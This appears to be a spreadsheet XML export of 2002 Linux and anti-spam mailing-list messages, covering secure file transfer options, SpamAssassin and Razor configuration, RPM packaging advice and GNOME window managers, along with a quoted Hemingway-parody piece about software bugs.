    <t>Tue, 13 Aug 2002 14:07:26 +0100</t>
  </si>
  <si>
    <t>kevin lyda &lt;kevin+dated+1029676051.792347@ie.suberic.net&gt;</t>
  </si>
  <si>
    <t>Re: [ILUG] Secure remote file access</t>
  </si>
  <si>
    <t>On Tue, Aug 13, 2002 at 12:22:14PM +0100, Niall O Broin wrote:\n&gt; What are the best options available on Linux ? SFTP ? WebDAV ? Something\n&gt; else ? Linux servers - Linux and Mac OS-X clients.\n\n[URL]http://www.fs.net[/URL]\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ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://www.fs.net http://ie.suberic.net http://www.linux.ie</t>
  </si>
  <si>
    <t>To: Theo Van Dinter &lt;felicity@kluge.net&gt;\nFrom: Mike Burger &lt;mburger@bubbanfriends.org&gt;\nDate: Tue, 13 Aug 2002 14:03:47 -0500 (EST)</t>
  </si>
  <si>
    <t>Tue, 13 Aug 2002 14:03:47 -0500 (EST)</t>
  </si>
  <si>
    <t>Mike Burger &lt;mburger@bubbanfriends.org&gt;</t>
  </si>
  <si>
    <t>On Tue, 13 Aug 2002, Theo Van Dinter wrote:\n\n&gt; On Tue, Aug 13, 2002 at 11:58:03AM -0500, Justin Shore wrote:\n&gt; &gt; I'm assuming I need to strip the SpamAssassinReport.txt attachments \n&gt; &gt; from my spam mailbox before I run the mailbox through razor-report, \n&gt; &gt; correct?  Does anyone know of an easy way to do this?\n&gt; \n&gt; use "spamassassin -r".  It'll take a message, strip the SA bits, and\n&gt; report to razor, all in one shot. :)\n\nAs long as you're not using razor2, that is, right?\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David Raistrick &lt;drais@wow.atlasta.net&gt;\nFrom: Mike Burger &lt;mburger@bubbanfriends.org&gt;\nDate: Tue, 13 Aug 2002 14:03:20 -0500 (EST)</t>
  </si>
  <si>
    <t>Tue, 13 Aug 2002 14:03:20 -0500 (EST)</t>
  </si>
  <si>
    <t>On Tue, 13 Aug 2002, David Raistrick wrote:\n\n&gt; To actually answer Justin's question, (one can assume that he has\n&gt; rewrite_subject and report_header turned on because he wants them..and\n&gt; that he would like to be able to strip the added bits off before he sends\n&gt; them to razor) something as simple as the following would probably work\n&gt; just fine.  Just pipe your message through this, then on into\n&gt; razor-report:\n\nI wouldn't make that assumption.  I'd assume that rewrite_subject was on, \nand report_header was off, because that's the default configuration, and \nnot everyone knows to go look in the user_prefs file to make those \nchanges.\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ilug@linux.ie, Niall O Broin &lt;niall@linux.ie&gt;\nFrom: Donncha O Caoimh &lt;donncha.ocaoimh@tradesignals.com&gt;\nDate: Tue, 13 Aug 2002 14:02:00 +0100</t>
  </si>
  <si>
    <t>Tue, 13 Aug 2002 14:02:00 +0100</t>
  </si>
  <si>
    <t>ilug@linux.ie, Niall O Broin &lt;niall@linux.ie&gt;</t>
  </si>
  <si>
    <t>rsync over ssh.. very nice!\n\nDonncha.\n\n\nOn Tuesday 13 August 2002 12:22, Niall O Broin wrote:\n&gt; What are the best options available on Linux ? SFTP ? WebDAV ? Something\n&gt; else ? Linux servers - Linux and Mac OS-X clients.\n&gt;\n&gt;\n&gt;\n&gt; Niall\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: Theo Van Dinter &lt;felicity@kluge.net&gt;\nFrom: Justin Shore &lt;listuser@neo.pittstate.edu&gt;\nDate: Tue, 13 Aug 2002 14:00:21 -0500</t>
  </si>
  <si>
    <t>Tue, 13 Aug 2002 14:00:21 -0500</t>
  </si>
  <si>
    <t>At 2:46 PM -0400 8/13/02, Theo Van Dinter wrote:\n&gt;On Tue, Aug 13, 2002 at 01:01:42PM -0500, Justin Shore wrote:\n&gt;&gt;  Ah...  You learn something new every day!  This would make things\n&gt;&gt;  quite a bit easier.  I assume it can handle a mailbox full of mail to\n&gt;&gt;  report rather than a single piece of spam from STDIN.  I'll check the\n&gt;&gt;  docs on that though.\n&gt;\n&gt;Unfortunately not, it's a one at a time thing.  If it would help\n&gt;you, I have a script that I use which handles a mbox file at a time,\n&gt;strips the SA stuff, reports to razor, and can then do things like\n&gt;open relay checks, reports to spamcop, etc.  It's available via:\n&gt;[URL]http://www.kluge.net[/URL]\n\nI'll give that a looksie.  I've been running a week's worth of \nmaillog relay= IPs through rbcheck every Sunday.  Found quite a few. \nI should break up the list and run multiple rbcheck instances.  Just \nhaven't gotten there yet though.  I think I'll have either MIMEDefang \nor Procmail keep a copy of messages over a certain score for daily \nrazor-reporting.  I could just let SA do it too I suppose.\n\nSay, maybe you can tell me what I'm doing wrong in SA.  I added \nreport_header 1 to my \n/etc/mail/mimedefang/spamassassin/sa-mimedefang.cf but it didn't \nappear to change anything.  I bounced over another copy of spam to my \nspamtrap and it still created the SPAM: attachment.  sa-mimedefang.cf \nhas this in it now:\n\nrequired_hits           1\nauto_report_threshold   100\nok_locales              en\nrewrite_subject 0\nreport_header 1\nuse_terse_report 1\ndefang_mime 0\nskip_rbl_checks 1\n\nI can't figure out if that was the write cf to modify or not.  I also \nhave a /etc/mail/spamassassin/local.cf but it's empty.  I think I \nmight be taking too many bites out of too many pies at once. :-)  The \nrequired_hits changes I made to sa-mimedefang.cf seem to have worked. \nI don't know why the report_header change didn't though.  Any ideas?\n\nJustin\n-- \n\n--\nJustin Shore, ES-SS ES-SSR      Pittsburg State University\nNetwork &amp; Systems Manager       Kelce 157Q\nOffice of Information Systems   Pittsburg, KS 66762\nVoice: (620) 235-4606           Fax: (620) 235-4545\n[URL]http://www.pittstate.edu[/URL]\n\nWarning:  This message has been quadruple Rot13'ed for your protectio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http://www.kluge.net http://www.pittstate.edu http://seeker.dice.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: Irish LUG list &lt;ilug@linux.ie&gt;\nFrom: David Neary &lt;bolsh@gimp.org&gt;\nDate: Tue, 13 Aug 2002 13:59:06 +0200</t>
  </si>
  <si>
    <t>Tue, 13 Aug 2002 13:59:06 +0200</t>
  </si>
  <si>
    <t>Re: [ILUG] gargnome &amp; sawfish..</t>
  </si>
  <si>
    <t>John P. Looney wrote:\n&gt;  I decided to try out GarGnome, to see what gnome2 looks like. It's\n&gt; pretty, I'll give it that.\n&gt; \n&gt;  However, there seemed to be loads of bugs - sawfish threw wobblers all\n&gt; over the place, so I tryed out metacity - which doesn't have a GUI\n&gt; configurator, and arsed if I'm going back to the fvwm days when you had to\n&gt; set settings by hand, without an idea what the values looked like.\n\nHave you tried gconf-editor? It's a GUI front-end to gconf\nsettings (and metacity has it's settings handled by gconf, like\nall good gnome2 apps). It's true there's no designated metacity\nconfigurator - but the whole point of metacity is to have\nreasonable defaults, and thus get away from the need for settings\naltogether, and have the window manager be not in the way (as so\nmany are).\n\nAs to the sawfish issue, no idea, sorry - are you sure that\ngnome2's panel handles 1.4 applets at all?\n\nCheers,\nDave.\n\n-- \n       David Neary,\n    Marseille, France\n  E-Mail: bolsh@gimp.org\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: "Brian O'Donoghue" &lt;Brian.ODonoghue@kbs.ie&gt;, &lt;ilug@linux.ie&gt;\nFrom: "Matthew French" &lt;mfrench42@yahoo.co.uk&gt;\nDate: Tue, 13 Aug 2002 13:50:22 +0100</t>
  </si>
  <si>
    <t>Tue, 13 Aug 2002 13:50:22 +0100</t>
  </si>
  <si>
    <t>"Brian O'Donoghue" &lt;Brian.ODonoghue@kbs.ie&gt;, &lt;ilug@linux.ie&gt;</t>
  </si>
  <si>
    <t>Re: [ILUG] SUSE 8 disks? (thread changed slightly)</t>
  </si>
  <si>
    <t>Brian O'Donoghue asked:\n&gt; &gt; Of course, it would require a minimum of EUR300,000 in funding\n&gt;\n&gt; It would?\n\nWell, yes, if I were to add all the frilly pink bits and the crunchy\nchocolate flavoured pieces... :)\n\nSeriously, I can only see two reasons to start another distro: you have\nsomething fundamentally different to offer, or you are customising an\nexisting distro for an unusual and specific situation. Between\nMandrake/YellowDog, RedHat/SuSe and Debian you have enough options to cover\nmost day-to-day requirements. And a lot of the specific situations are\nalready covered (smoothwall, familiar, etc.)\n\nTherefore, if I were to create a new Linux distribution, I would have to\nspend time crafting it so that it offers a lot more than existing\nalternatives. My requirements normally involve better support/easier\nmaintenance, and if one follows the logic through, this would require a\ncompany to be behind such an initiative.\n\nI imagine it would be possible to create a new distribution in about one\nweek[1]. For example: take Debian as your base, slap a specific set of\npackages on CD, change a few config files, mention that it has been untested\non most hardware variations, and voila, a "new" distie. :)\n\n- Matthew\n\n[1] That is, IT weeks. 1 IT week ~= two months. :)\n\n\n__________________________________________________\nDo You Yahoo!?\nEverything you'll ever need on one web page\nfrom News and Sport to Email and Music Charts\n[URL]http://uk.my.yahoo.com[/URL]\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: Declan &lt;skyhawk@redbrick.dcu.ie&gt;\nDate: Tue, 13 Aug 2002 13:24:40 +0100</t>
  </si>
  <si>
    <t>Tue, 13 Aug 2002 13:24:40 +0100</t>
  </si>
  <si>
    <t>Declan &lt;skyhawk@redbrick.dcu.ie&gt;</t>
  </si>
  <si>
    <t>On Tue, Aug 13, 2002 at 12:22:14PM +0100, Niall O Broin wrote:\n&gt; What are the best options available on Linux ? SFTP ? WebDAV ? Something\n&gt; else ? Linux servers - Linux and Mac OS-X clients.\n&gt; \n\n\nIf you mean secure file transfer\nscp is good\n\n-- \n\nRedbrick - Dublin City University Networking Society\nDeclan McMullen - Education Officer\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: Stephen Shirley &lt;diamond@skynet.ie&gt;\nDate: Tue, 13 Aug 2002 13:23:45 +0100</t>
  </si>
  <si>
    <t>Tue, 13 Aug 2002 13:23:45 +0100</t>
  </si>
  <si>
    <t>Stephen Shirley &lt;diamond@skynet.ie&gt;</t>
  </si>
  <si>
    <t>On Tue, Aug 13, 2002 at 12:22:14PM +0100, Niall O Broin wrote:\n&gt; What are the best options available on Linux ? SFTP ? WebDAV ? Something\n&gt; else ? Linux servers - Linux and Mac OS-X clients.\n\nCan't speak for the other alternatives, but i've been using scp for\nyears with sexy results.\n\nSteve, yes, it's a simpsons quote(ish).\n-- \nHigh salt diets are bad for you - but only outside marriage.\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: RPM-List &lt;rpm-zzzlist@freshrpms.net&gt;\nFrom: Matthias Saou &lt;matthias@rpmforge.net&gt;\nDate: Tue, 13 Aug 2002 13:10:54 +0200</t>
  </si>
  <si>
    <t>Tue, 13 Aug 2002 13:10:54 +0200</t>
  </si>
  <si>
    <t>Re: Advise on RPM buidling</t>
  </si>
  <si>
    <t>Once upon a time, Mark wrote : &gt; I'm just playing with gnuboy (game boy emulator) as its fairly simple &gt; and small. &gt; I'm having a few problems with the %docs macro. &gt; After reading thru maximum rpm and the rpm docs, I'm still stuck on one &gt; thing, in the source for gnuboy there is a directory called docs, that &gt; contains, well the docs. &gt;  &gt; I'm not sure what to pass to the %docs macro? &gt; I originally tried: &gt; %doc CHANGES  CONFIG  CREDITS  FAQ  HACKING  LIBERTY  README.old   &gt;  &gt; and it moans about missing files, would I have to put a few lines in the &gt; %build macro, just before configure to move the docs out of that &gt; directory and into the build root? &gt;  &gt; ie: mv docs/* ../ Actually, I've already rebuild gnuboy, I just had forgotten to commit the spec file, which is now done : [URL]http://freshrpms.net[/URL] Basically, %doc is used to put files in %docdir (default to /usr/share/docs/%{name}-%{version}/ and the listed files with relative paths (i.e. that don't start with a "/") are relative to the %{builddir} (the uncompressed source usually). So either you can choose to have a "docs" directory inside %{_docdir} by putting : %doc docs (or, totally equivalent, the latter just reminding it's a directory) %doc docs/ Or you can put all files that are in docs/ directly in %{_docdir} : %doc docs/* Try both, poke around, and you should catch the difference if it's not already clear for you. You can also mark any file from the %{buildroot} as documentation (will be listed when using "-qd" to query the package's docs) by using %doc with absolute filenames, for example : %doc %{_datadir}/foo-game/manual (this is /usr/share/foo-game/manual, an absolute file) Also, for the packager's convenience, all files in /usr/share/man (aka %{_mandir}) are automatically tagged as %doc. &gt; Also one more thing, whats the best way to work out the dependencies? &gt; as for example with gnuboy, all hte docs and the website says is it &gt; needs SDL. &gt;  &gt; Do I set a Requires: SDL &gt;= 1.2 (as my system uses SDL-1.2.4-5) or just &gt; put Requires: SDL. Build the package once and see if it checks for a specific version, or read the installation notes. Often you'll see "checking for SDL &gt;= 1.2.0" for example when running configure, then it's best to also make the package depend on that version. &gt; One more quick question, I'm used to compiling source code no problem &gt; (cannot program, but stumble through), whats the best way for finding &gt; out what RPMS are needed for the Requires &amp; BuildRequires macros? &gt; apart from read all the docs and websites info. Well, read the docs indeed :-) You can also compile the package once without those fields and see what the configure script is checking for (basically, the libs and versions you'll need to add to the BuildRequires:) then once the package is built, query the automatic dependencies that rpm put into it. You'll see for instance if the binaries/libs from the package need SDL, gtk+  etc. Then add those "Requires:" and rebuild a final version of the package. Often you can omit some dependencies, for example if a program is checking for glib, gtk+, gdk-pixbuf and gnome libraries when being compiled, BuildRequires: gnome-libs-devel Requires: gnome-libs will be enough since they already depend on the "lower level" libs that are glib, gtk+ and gdk-pixbuf. &gt; Once again sorry to bother you with this, but I figured you were the &gt; best one to ask. Well, this is typically the type of information interesting to share with others, so I'll copy this answer to the rpm-list hoping some people will appreciate :-) &gt; p.s freshrpms rocks .. creep..creep! Thanks ;-) Matthias --  Clean custom Red Hat Linux rpm packages : [URL]http://freshrpms.net[/URL] Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-5 Load : 0.29 0.20 0.32, AC on-line, battery charging: 100% (8:29) _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>http://freshrpms.net http://freshrpms.net http://lists.freshrpms.net</t>
  </si>
  <si>
    <t>To: Irish LUG list &lt;ilug@linux.ie&gt;\nFrom: "John P. Looney" &lt;valen@tuatha.org&gt;\nDate: Tue, 13 Aug 2002 13:10:30 +0100</t>
  </si>
  <si>
    <t>Tue, 13 Aug 2002 13:10:30 +0100</t>
  </si>
  <si>
    <t>On Tue, Aug 13, 2002 at 01:59:06PM +0200, David Neary mentioned:\n&gt; Have you tried gconf-editor? It's a GUI front-end to gconf\n&gt; settings (and metacity has it's settings handled by gconf, like\n&gt; all good gnome2 apps).\n\n Hmm. It's even worse than using a text editor on a file.\n\n&gt; It's true there's no designated metacity configurator - but the whole\n&gt; point of metacity is to have reasonable defaults, and thus get away from\n&gt; the need for settings altogether, and have the window manager be not in\n&gt; the way (as so many are).\n\n Don't buy it.\n\n shift-alt-s should start a shell, alt-d should maximise a window\nvertically, alt-q should close a window, alt-w should shade it. These I've\nused for about eight years, and I'm not about to change them now.\n\n Stuff like alt-1 to go to workspace-1, I love - it just appeared in\nwindowmaker about six years back, and I've also gotten used to it.\n\n&gt; As to the sawfish issue, no idea, sorry - are you sure that\n&gt; gnome2's panel handles 1.4 applets at all?\n\n Wierdly, I've gone back to sawfish &amp; gnome 1.4 - and the keybindings\nstill don't work. It's not fair.\n\nKate\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: "Ilug@Linux.Ie" &lt;ilug@linux.ie&gt;\nFrom: "Justin MacCarthy" &lt;macarthy@iol.ie&gt;\nDate: Tue, 13 Aug 2002 13:09:09 +0100</t>
  </si>
  <si>
    <t>Tue, 13 Aug 2002 13:09:09 +0100</t>
  </si>
  <si>
    <t>[ILUG] Linux: the film.</t>
  </si>
  <si>
    <t>Linux: the film.\n[URL]http://www.revolution-os.com[/URL]  (trailer + first 8 mins online)\n\nI wonder if this will ever get to Ireland? Otherwise, I wonder if it would\nbe possible to get the Trinity Internet Society or somewhere to show it?\n\nJustin\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://www.revolution-os.com http://www.linux.ie</t>
  </si>
  <si>
    <t>To: Mike Burger &lt;mburger@bubbanfriends.org&gt;\nFrom: Justin Shore &lt;listuser@neo.pittstate.edu&gt;\nDate: Tue, 13 Aug 2002 13:06:16 -0500</t>
  </si>
  <si>
    <t>Tue, 13 Aug 2002 13:06:16 -0500</t>
  </si>
  <si>
    <t>At 12:20 PM -0500 8/13/02, Mike Burger wrote:\n&gt;Make sure you have this in your .spamassassin/user_prefs:\n\nThis might be a problem.  I'll have to look into it further.  I just \ngot SA working yesterday.  It's being called from MIMEDefang.  I'm \nnot sure if it will look for user preferences when run like that. \nOne would hope it would be I can't say for certain.  I'll look in to \nit.\n\n&gt;# By default, the subject lines of suspected spam will be tagged.\n&gt;# This can be disabled here.\n&gt;#\n&gt;rewrite_subject 0\n\nYeah, I disabled the subject rewrite.  I also lowered required_hits \nto 1 (wonder if I can do zero) so that almost all mail is scored--I'm \ntesting it right now.  auto_report_threshold was raised to 100 to \nmake sure that all mail gets through to me for now.\n\n&gt;# By default, spamassassin will include its report in the body\n&gt;# of suspected spam. Enabling this causes the report to go in the\n&gt;# headers instead. Using 'use_terse_report' for this is recommended.\n&gt;#\n&gt;report_header 1\n\nAh, now I didn't notice this.  I rather like this option.  I may set \nmy global default to this.\n\n&gt;The first tells it not to add *****SPAM***** to the subject, the second\n&gt;tells it to put the report in the headers, instead of the body.\n&gt;\n&gt;If the report is in the headers, it won't be calculated in the\n&gt;razor-check.\n\nThis makes sense.  I may do that for just this reason.  Thanks!\n\nJustin\n-- \n\n--\nJustin Shore, ES-SS ES-SSR      Pittsburg State University\nNetwork &amp; Systems Manager       Kelce 157Q\nOffice of Information Systems   Pittsburg, KS 66762\nVoice: (620) 235-4606           Fax: (620) 235-4545\n[URL]http://www.pittstate.edu[/URL]\n\nWarning:  This message has been quadruple Rot13'ed for your protectio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http://www.pittstate.edu http://seeker.dice.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: Theo Van Dinter &lt;felicity@kluge.net&gt;\nFrom: Justin Shore &lt;listuser@neo.pittstate.edu&gt;\nDate: Tue, 13 Aug 2002 13:01:42 -0500</t>
  </si>
  <si>
    <t>Tue, 13 Aug 2002 13:01:42 -0500</t>
  </si>
  <si>
    <t>At 1:52 PM -0400 8/13/02, Theo Van Dinter wrote:\n&gt;On Tue, Aug 13, 2002 at 11:58:03AM -0500, Justin Shore wrote:\n&gt;&gt;  I'm assuming I need to strip the SpamAssassinReport.txt attachments\n&gt;&gt;  from my spam mailbox before I run the mailbox through razor-report,\n&gt;&gt;  correct?  Does anyone know of an easy way to do this?\n&gt;\n&gt;use "spamassassin -r".  It'll take a message, strip the SA bits, and\n&gt;report to razor, all in one shot. :)\n\nAh...  You learn something new every day!  This would make things \nquite a bit easier.  I assume it can handle a mailbox full of mail to \nreport rather than a single piece of spam from STDIN.  I'll check the \ndocs on that though.\n\nThanks!\n  Justin\n-- \n\n--\nJustin Shore, ES-SS ES-SSR      Pittsburg State University\nNetwork &amp; Systems Manager       Kelce 157Q\nOffice of Information Systems   Pittsburg, KS 66762\nVoice: (620) 235-4606           Fax: (620) 235-4545\n[URL]http://www.pittstate.edu[/URL]\n\nWarning:  This message has been quadruple Rot13'ed for your protectio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Patrick &lt;patrick@stealthgeeks.net&gt;\nFrom: Justin Shore &lt;listuser@neo.pittstate.edu&gt;\nDate: Tue, 13 Aug 2002 13:00:00 -0500</t>
  </si>
  <si>
    <t>Tue, 13 Aug 2002 13:00:00 -0500</t>
  </si>
  <si>
    <t>At 10:12 AM -0700 8/13/02, Patrick wrote:\n&gt;On Tue, 13 Aug 2002, Justin Shore wrote:\n&gt;\n&gt;&gt;  I'm assuming I need to strip the SpamAssassinReport.txt attachments\n&gt;&gt;  from my spam mailbox before I run the mailbox through razor-report,\n&gt;&gt;  correct?  Does anyone know of an easy way to do this?\n&gt;\n&gt;man spamassassin\n\nWhoops.  Sorry 'bout that.  Didn't think to check spamassassin's man page.\n-- \n\n--\nJustin Shore, ES-SS ES-SSR      Pittsburg State University\nNetwork &amp; Systems Manager       Kelce 157Q\nOffice of Information Systems   Pittsburg, KS 66762\nVoice: (620) 235-4606           Fax: (620) 235-4545\n[URL]http://www.pittstate.edu[/URL]\n\nWarning:  This message has been quadruple Rot13'ed for your protectio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Rodent of Unusual Size &lt;Ken.Coar@Golux.Com&gt;\nFrom: "Joseph S. Barrera III" &lt;joe@barrera.org&gt;\nDate: Tue, 13 Aug 2002 12:59:26 -0700</t>
  </si>
  <si>
    <t>Tue, 13 Aug 2002 12:59:26 -0700</t>
  </si>
  <si>
    <t>Rodent of Unusual Size wrote:\n&gt; I'm not up to forking the text, but for your entertainment:\n&gt; \n&gt; [URL]http://www.kanga.nu[/URL]\n\nFine, *I'll* fork it. This piece has been up on the wall of our\nCTO's office for years. It deserves to be forked, or even reforked.\n\n- Joe\n\n(BTW, RAID is the home-grown bug tracking system used at Microsoft.\nSee e.g. [URL]http://www.stsc.hill.af.mil[/URL]\nIt was a fine tool, better than any other I've had to use...)\n\n\n\nThe Bug Count Also Rises\n\n\nby John Browne\n(Imitation Hemingway Contest Winner)\n\nIn the fall of that year the rains fell as usual and washed the leaves \nof the dust and dripped from the leaves onto the ground. The shuttles \ndrove through the rainy streets and took the people to meetings, then \nlater brought them back, their tires spraying the mist into the air.\n\nMany days he stood for a long time and watched the rain and the shuttles \nand drank his double-tall mochas. With the mochas he was strong.\n\nHernando who worked down the hall and who was large with microbrews came \nto him and told him that the ship day was upon them but the bugs were \nnot yet out. The bugs which were always there even when you were in \nCafes late at night sipping a Redhook or a double-tall mocha and you \nthought you were safe but they were there and although Enrico kept the \nfloor swept clean and the mochas were hot the bugs were there and they \nate at you.\n\nWhen Hernando told him this he asked how many bugs. "The RAID is huge \nwith bugs," Hernando said. "The bugs are infinite."\n\n"Why do you ask me? You know I cannot do this thing anymore with the bugs."\n\n"Once you were great with the bugs," Hernando said. "No one was \ngreater," he said again. "Even Prado."\n\n"Prado? What of Prado? Let Prado fix the bugs."\n\nHernando shrugged. "Prado is finished. He was gored by three Sev 2's in \nChicago. All he does now is drink herb tea and play with his screensavers."\n\n"Herb tea?"\n\n"It is true, my friend." Hernando shrugged again. Later he went to his \noffice and sat in the dark for a long time. Then he sent e-mail to Michaels.\n\nMichaels came to him while he was sipping a mocha. They sat silently for \nawhile, then he asked Michaels, "I need you to triage for me."\n\nMichaels looked down. "I don't do that anymore," he said.\n\n"This is different. The bugs are enormous. There are an infinity of bugs."\n\n"I'm finished with that," Michaels said again. "I just want to live \nquietly."\n\n"Have you heard Prado is finished? He was badly gored. Now he can only \ndrink herb tea."\n\n"Herb tea?" Michaels said.\n\n"It is true," he said sorrowfully.\n\nMichaels stood up. "Then I will do it, my friend," he said formally. "I \nwill do it for Prado, who was once great with the bugs. I will do it for \nthe time we filled Prado's office with bouncy balls, and for the time \nPrado wore his nerf weapons in the marketing hall and slew all of them \nwith no fear and only a great joy at the combat. I will do it for all \nthe pizza we ate and the bottles of Coke we drank."\n\nTogether they walked slowly back, knowing it would be good. As they \nwalked the rain dripped softly from the leaves, and the shuttles carried \nthe bodies back from the meetings.\n\n-- \nThe Combatant State is your father and your mother, your only\nprotector, the totality of your interests. No discipline can\nbe stern enough for the man who denies that by word or deed.\n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://www.kanga.nu http://www.stsc.hill.af.mil http://xent.com</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: Niall O Broin &lt;niall@linux.ie&gt;\nDate: Tue, 13 Aug 2002 12:22:14 +0100</t>
  </si>
  <si>
    <t>Tue, 13 Aug 2002 12:22:14 +0100</t>
  </si>
  <si>
    <t>[ILUG] Secure remote file access</t>
  </si>
  <si>
    <t>What are the best options available on Linux ? SFTP ? WebDAV ? Something\nelse ? Linux servers - Linux and Mac OS-X clients.\n\n\n\nNiall\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: Mike Burger &lt;mburger@bubbanfriends.org&gt;\nFrom: David Raistrick &lt;drais@wow.atlasta.net&gt;\nDate: Tue, 13 Aug 2002 12:12:25 -0700 (PDT)</t>
  </si>
  <si>
    <t>Tue, 13 Aug 2002 12:12:25 -0700 (PDT)</t>
  </si>
  <si>
    <t>On Tue, 13 Aug 2002, Mike Burger wrote:\n\n&gt; On Tue, 13 Aug 2002, David Raistrick wrote:\n&gt; \n&gt; &gt; To actually answer Justin's question, (one can assume that he has\n&gt; &gt; rewrite_subject and report_header turned on because he wants them..and\n\n&gt; I wouldn't make that assumption.  I'd assume that rewrite_subject was on, \n&gt; and report_header was off, because that's the default configuration, and \n\nErps.  I did misword that.  The message (and assumption) was oriented\ntoward a message that has rewrite_subject on and report_header off...the\ndefault configuration.  For the header removals it contained enough to\nalso take care of dcc_add_header 1, but not report_header 1.\n\nthanks.\n\n..david\n\n---\ndavid raistrick\ndrais@atlasta.net		[URL]http://www.expita.com[/URL]\n\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http://www.expita.com http://seeker.dice.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: "Smith, Graham - Computing Technician" &lt;Graham.Smith@it-tallaght.ie&gt;\nDate: Tue, 13 Aug 2002 12:06:59 +0100</t>
  </si>
  <si>
    <t>Tue, 13 Aug 2002 12:06:59 +0100</t>
  </si>
  <si>
    <t>RE: [ILUG] I hate noise!</t>
  </si>
  <si>
    <t>I ususally disconnect the internal speaker - thats pretty sure to stop any\nbeeping!\n\nG.\n___________________________\n Graham Smith,\n Network Administrator,\n Department of Computing,\n Institute of Technology,\n Tallaght, Dublin 24\n Phone: + 353 (01) 4042840\n\n-----Original Message-----\nFrom: ibhear [mailto:eibhear.geo@yahoo.com]\nSent: 12 August 2002 16:49\nTo: ibhear; Padraig Brady; ilug@linux.ie\nSubject: Re: [ILUG] I hate noise!\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: razor-users@example.sourceforge.net\nFrom: Justin Shore &lt;listuser@neo.pittstate.edu&gt;\nDate: Tue, 13 Aug 2002 11:58:03 -0500</t>
  </si>
  <si>
    <t>Tue, 13 Aug 2002 11:58:03 -0500</t>
  </si>
  <si>
    <t>[Razor-users] Stripping the SpamAssassin report</t>
  </si>
  <si>
    <t>I'm assuming I need to strip the SpamAssassinReport.txt attachments \nfrom my spam mailbox before I run the mailbox through razor-report, \ncorrect?  Does anyone know of an easy way to do this?\n\nThanks\n  Justin\n-- \n\n--\nJustin Shore, ES-SS ES-SSR      Pittsburg State University\nNetwork &amp; Systems Manager       Kelce 157Q\nOffice of Information Systems   Pittsburg, KS 66762\nVoice: (620) 235-4606           Fax: (620) 235-4545\n[URL]http://www.pittstate.edu[/URL]\n\nWarning:  This message has been quadruple Rot13'ed for your protectio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To: "'ilug@linux.ie'" &lt;ilug@linux.ie&gt;\nFrom: "Brian O'Donoghue" &lt;Brian.ODonoghue@kbs.ie&gt;\nDate: Tue, 13 Aug 2002 11:18:22 +0100</t>
  </si>
  <si>
    <t>Tue, 13 Aug 2002 11:18:22 +0100</t>
  </si>
  <si>
    <t>RE: [ILUG] SUSE 8 disks? (thread changed slightly)</t>
  </si>
  <si>
    <t>&gt; Of course, it would require a minimum of EUR300,000 in funding, which is\n&gt; the\n&gt; reason I have not started this project myself... :(\n&gt; \n&gt; - Matthew\n\nIt would?\nSounds like you are talking about setting up a company, to be a vendor....\nI'd venture the early days of Debian, Slackware and other involveds there\nwas no such financing.\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: David Raistrick &lt;drais@wow.atlasta.net&gt;\nFrom: Patrick &lt;patrick@stealthgeeks.net&gt;\nDate: Tue, 13 Aug 2002 11:07:27 -0700 (PDT)</t>
  </si>
  <si>
    <t>Tue, 13 Aug 2002 11:07:27 -0700 (PDT)</t>
  </si>
  <si>
